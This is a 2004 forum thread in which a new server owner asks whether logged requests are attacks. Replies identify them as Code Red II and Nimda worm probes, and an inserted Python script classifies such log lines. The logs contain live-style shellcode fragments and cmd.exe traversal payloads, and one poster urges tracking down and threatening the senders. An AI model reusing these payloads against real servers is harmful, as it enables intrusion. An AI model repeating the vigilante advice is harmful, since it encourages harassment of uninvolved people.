Full Version: Is This An Attack?
StevenMig
I am not 100% sure if this is the place to ask, but the security forum seemed to only post exploits. Anyway, I set up a web server, just to test it out.
I haven't had my computer on too much, only two days, and not even full ones, but I found some interesting log entries:
CODE
68.20.213.67 - - [17/Mar/2004:17:58:06 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 405 "-" "-"

68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 408 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 465 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.50.47.131 - - [17/Mar/2004:19:39:44 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:30 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:31 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 408 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:31 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 418 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:32 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 449 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 465 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:33 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:34 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:34 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 431 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:36 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
68.118.223.203 - - [17/Mar/2004:20:24:36 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"

I don't care about the people or tracking them down, but one of my goals for running a server is to help me learn about computer security, so I am wondering if I identified this correctly as an attack. The first one looks like a buffer overflow, and the rest look like a canned program looking for vulnerable scripts or trying to open a command prompt (obviously the attacker or program didn't do any checking, considering most of the requests are for a Windows server).
hughesjr
The one with all the xxxxxxxxxxxxxxxx's is an infected code red II server trying to infect your server.


The ones with the .exe files are NIMDA.

If you were running an IIS server that is unpatched, then it would now be infected....
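Since the question in this thread is how to tell from the log whether these probes meant anything, here is a small triage script, added as an illustration; it is not code from the thread or from any of its posters. It parses lines in the Apache access-log format shown above, labels the two patterns hughesjr names (Code Red's /default.ida request and Nimda's root.exe and cmd.exe requests), counts them per source address, and flags any such request that received a 2xx response, which is the case that would actually need a closer look. The sample log lines are constructed (RFC 5737 documentation addresses, not real hosts), and the regular expressions are my own, built from the encodings visible in the quoted log.

```python
import re
from collections import Counter
from typing import Optional

# Apache access-log format as it appears in the thread: client, ident, user,
# [timestamp], "METHOD path protocol", status, size, then referer/agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Code Red II: a GET for /default.ida with a long filler of X's followed by
# %uXXXX-encoded bytes in the query string.
CODE_RED_RE = re.compile(r'^/default\.ida\?X{20,}.*%u[0-9a-fA-F]{4}')

# Nimda: requests for the root.exe backdoor left by earlier worms, or for
# cmd.exe, always with "?/c+" to hand a command to the shell.
NIMDA_EXE_RE = re.compile(r'/(?:root|cmd)\.exe\?/c\+', re.IGNORECASE)

# Double-encoded and overlong-UTF-8 forms of "../" seen in the thread's log.
TRAVERSAL_RE = re.compile(
    r'\.\.(?:%255c|%252f|%c0%af|%c0%2f|%c1%1c|%c1%9c|%%35%63|%%35c|%25%35%63)',
    re.IGNORECASE,
)


def parse_line(line: str) -> Optional[dict]:
    """Split one access-log line into fields; return None for non-matching lines."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path: str) -> Optional[str]:
    """Label a request path, or return None when it matches no known pattern."""
    if CODE_RED_RE.search(path):
        return "code-red"
    if NIMDA_EXE_RE.search(path):
        return "nimda"
    if TRAVERSAL_RE.search(path):
        return "traversal-probe"
    return None


def summarize(log_text: str) -> dict:
    """Count labelled requests per source and flag any the server actually served."""
    labels: Counter = Counter()
    sources: Counter = Counter()
    served = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec["path"])
        if label is None:
            continue
        labels[label] += 1
        sources[rec["ip"]] += 1
        # 4xx means the path did not exist here; a 2xx on one of these would
        # mean the server answered a worm probe and needs investigating.
        if 200 <= rec["status"] < 300:
            served.append(line)
    return {"labels": dict(labels), "sources": dict(sources), "served": served}


# Constructed sample in the same format as the thread's log; the addresses are
# from RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Mar/2004:17:58:06 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 405 "-" "-"
192.0.2.20 - - [17/Mar/2004:19:39:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 410 "-" "-"
192.0.2.20 - - [17/Mar/2004:19:39:42 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 432 "-" "-"
192.0.2.20 - - [17/Mar/2004:19:39:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 422 "-" "-"
192.0.2.30 - - [17/Mar/2004:20:10:00 -0500] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for label, n in report["labels"].items():
        print(f"{label}: {n} request(s)")
    for ip, n in report["sources"].items():
        print(f"{ip}: {n} worm-style request(s)")
    print("served (2xx) worm probes:", len(report["served"]))
```

Run against a real access log (`summarize(open("access_log").read())`), an empty `served` list is the reassuring outcome: every probe hit a path that does not exist on an Apache box, which is exactly why hughesjr says a non-IIS server can ignore them.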
Termina
QUOTE
don't care about the people or tracking them down


Screw that, track down the bastards and make them pay. If not legally, then get the home address, and... *coughs*

*darts eyes around, and hands him a hachet*
Robert83
yeah :)

give her/him a zergling rush :) :) :)


Sincerely
Robert B
StevenMig
Wow, less than a day of uptime and this already. Anyway, should I really track them down?
Now I know I have to get my act together. If anything targeted me, I think I'd be pretty screwed. I haven't changed anything on my Apache server.
Termina
Yes, you really should.

At least scare them for a while. If you let them think they can get away with this kind of shit, they'll just keep doing it. If you threaten them with a lawsuit (especially if they're under 18), they'll piss themselves.
hughesjr
There are thousands of NIMDA and CODE RED infected servers out there ... they aren't doing it on purpose. (It is a worm ... if your server is infected .. it automatically tries to infect other servers). So long as you are not running IIS, I would just not worry about it. If you are running IIS and you haven't patched ... get a good antivirus program and scan your PC...
Termina
Ah... *falls over*

Too bad. =/ I... hate... people who do that kind of stuff. >_<

*grumbles and mutters*

Robert: Do you play StarCraft (currently)? If so, want to face me sometime? (Haven't played in a few months, but would love a match sometime)